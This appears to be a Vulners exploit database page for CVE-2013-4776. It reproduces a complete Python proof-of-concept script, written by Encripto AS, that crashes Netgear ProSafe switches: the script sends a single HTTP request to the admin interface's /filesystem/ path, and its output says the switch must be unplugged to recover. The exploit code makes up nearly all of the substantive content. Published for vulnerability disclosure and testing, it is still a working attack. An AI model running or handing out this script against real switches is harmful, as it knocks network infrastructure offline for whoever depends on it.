Vulners
Lucene search
Netgear ProSafe - Denial of Service Vulnerability
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Netgear ProSafe - Denial of Service Vulnerability | 22 Aug 201300:00 | – | zdt |
 | CVE-2013-4776 | 19 Dec 201302:00 | – | cve |
 | CVE-2013-4776 | 19 Dec 201302:00 | – | cvelist |
 | Netgear ProSafe - Denial of Service | 22 Aug 201300:00 | – | exploitdb |
 | NETGEAR ProSafe - Denial of Service | 22 Aug 201300:00 | – | exploitpack |
 | CVE-2013-4776 | 19 Dec 201304:24 | – | nvd |
 | Multiple NetGear ProSafe Switches Information Disclosure Vulnerability | 22 Aug 201300:00 | – | openvas |
 | Server side request forgery (ssrf) | 19 Dec 201304:24 | – | prion |
 | Netgear ProSafe switches: Unauthenticated startup-config disclosure and Denial of Service | 9 Oct 201300:00 | – | securityvulns |
| Netgear ProSafe switches security vulnerabilities | 9 Oct 201300:00 | – | securityvulns |
10
#!/usr/bin/python
################################################################
# #
# Netgear ProSafe - CVE-2013-4776 PoC #
# written by Juan J. Guelfo @ Encripto AS #
# [email protected] #
# #
# Copyright 2013 Encripto AS. All rights reserved. #
# #
# This software is licensed under the FreeBSD license. #
# http://www.encripto.no/tools/license.php #
# #
################################################################
import sys, getopt, urllib2
from subprocess import *
__version__ = "0.1"
__author__ = "Juan J. Guelfo, Encripto AS ([email protected])"
# Prints title and other header info
def header():
print ""
print " ================================================================= "
print "| Netgear ProSafe - CVE-2013-4776 PoC \t\t\t\t |".format(__version__)
print "| by {0}\t\t |".format(__author__)
print " ================================================================= "
print ""
# Prints help
def help():
header()
print """
Usage: python CVE-2013-4776.py [mandatory options]
Mandatory options:
-t target ...Target IP address
-p port ...Port where the HTTP admin interface is listening on
Example:
python CVE-2013-4776.py -t 192.168.0.1 -p 80
"""
sys.exit(0)
if __name__ == '__main__':
#Parse options
try:
options, args = getopt.getopt(sys.argv[1:], "t:p:", ["target=", "port="])
except getopt.GetoptError, err:
header()
print "\n[-] Error: {0}.\n".format(str(err))
sys.exit(1)
if not options:
help()
target = None
port = None
for opt, arg in options:
if opt in ("-t"):
target = arg
if opt in ("-p"):
port = arg
#Option input validation
if not target or not port:
help()
print "[-] Error: Incorrect syntax.\n"
sys.exit(1)
header()
headers = { "User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" }
try:
# Get the startup config via HTTP admin interface
print "[+] Triggering DoS condition..."
r = urllib2.Request('http://%s:%s/filesystem/' % (target, port), None, headers)
urllib2.urlopen(r,"",5).read()
except urllib2.URLError:
print "[-] Error: The connection could not be established.\n"
except:
print "[+] The switch should be freaking out..."
print "[+] Reboot the switch (unplug the power cord) to get it back to normal...\n"
sys.exit(0)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.37969